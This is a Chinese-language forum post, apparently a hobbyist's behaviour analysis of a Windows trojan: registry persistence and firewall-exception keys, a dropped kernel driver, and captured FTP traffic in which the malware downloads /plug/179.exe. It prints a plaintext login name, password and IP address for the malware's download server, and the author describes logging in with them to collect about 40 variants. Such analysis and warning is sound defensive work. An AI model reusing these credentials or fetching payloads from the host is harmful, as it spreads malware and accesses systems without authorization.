运行"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start激活病毒后:
注册表改动:
添加:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions" Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Type: REG_DWORD, Length: 4, Data: 0
-----------------------------------------------
网络动作:
从网上下载一个exe文件到C:\windows\temp\nlfdxfirc.exe并运行之;
===============================================
nlfdxfirc.exe激活后:
文件改动:
创建:
%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys
删除:
%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
-----------------------------------------------
注册表改动:
添加:
HKLM\SYSTEM\ControlSet001\Services\kuyths00 Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00 Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000 Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated* Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0 Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance Type: REG_DWORD, Length: 4, Data: 1
-----------------------------------------------
其他:
这时调用cdnprh.dll的rundll32.exe写入了一个注册表信息,也就是昨天的那个乱码情形了:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu
这个东西即使使用icesword查看也是乱码,估计加载时是靠那个驱动翻译为正常的信息;
===============================================
追寻它下载的那个exe文件的地址:
在查看抓的数据包时,没有直接看到exe文件的地址,但发现了下面的几个数据包:
220 Welcome to blah FTP service.
USER netserv3
韝?箹
331 Please specify the password.
PASS 43243wen9874
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
200 Switching to Binary mode.
PASV
PASV
227 Entering Passive Mode (60,18,146,34,150,163)
?
?
SIZE /plug/179.exe
SIZE /plug/179.exe
213 19776
RETR /plug/179.exe
150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).
我靠,是一个FTP站点,而且需要账号和密码,根据数据包信息,打开小车的站点资源探测器,地址为ftp://60.18.146.34/,登陆的用户为netserv3,口令为43243wen9874;
回车,成功登陆上去了!里面有不少文件,打开了plug目录,发现了20个大小相近的exe文件,全部下载下来一看,所有的CRC32校验码都是不同的!又打开了plugback目录,再次发现了20个大小几乎一样的exe文件!据测试是和plug目录里面的一样的;
另外还有一些其他文件,迟些在慢慢研究;
===============================================
随便测试了几个,他们的动作和那个nlfdxfirc.exe如出一辙!用卡巴扫描了一下,一个也不报!看来是高手所为了!我想这个东西可能在未来几天内流行起来!各位警惕一下!
